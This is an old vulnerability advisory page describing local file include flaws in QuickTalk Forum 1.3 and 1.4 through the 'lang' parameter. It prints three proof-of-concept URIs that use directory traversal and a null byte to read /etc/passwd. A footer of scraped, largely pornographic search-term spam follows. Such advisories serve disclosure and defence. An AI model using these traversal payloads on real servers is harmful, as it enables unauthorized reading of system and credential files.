about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , QuickTalk Forum Lang Parameter Multiple Local File Include Vulnerabilities


Title QuickTalk Forum Lang Parameter Multiple Local File Include Vulnerabilities
Published 2007-06-27-12:00AM
Updated 2008-01-31-04:57PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  katatafish is credited with the discovery of these vulnerabilities.
Vulnerable  QTcute QuickTalk Forum 1.4
QTcute QuickTalk Forum 1.3
Not Vulnerable  QT-cute QuickTalk Forum 1.5
Code  Attackers may exploit these issues through a browser.The following proof-of-concept URIs are available:http://www.example.com/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00 http://www.example.com/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00 http://www.example.com/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 14:24:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Phoneratic usasex.com arbi girl video porn XL girls Pinkword.c sexphotops usasex.com Wwwsex lk nayanatara 200 /compo news for c blue film Www.sex.tv Film sexsy chobits 1 www.fotobu net phto sexe Www.Karina addguest.h xxx+videof horse havi /search/ex Sexy woman Www.Karina www.xvidoe 89 COM horse havi Www.Karina vidoe porn hantai sex yuni gadis Sexy woman sex aneml www.sexani blue film www.trisha www.google 200 /compo NANGA PHOT linux loac Www.tube8. 200 /compo all cartoo Www.porn.c www.acio.e t560t news for c www.trisha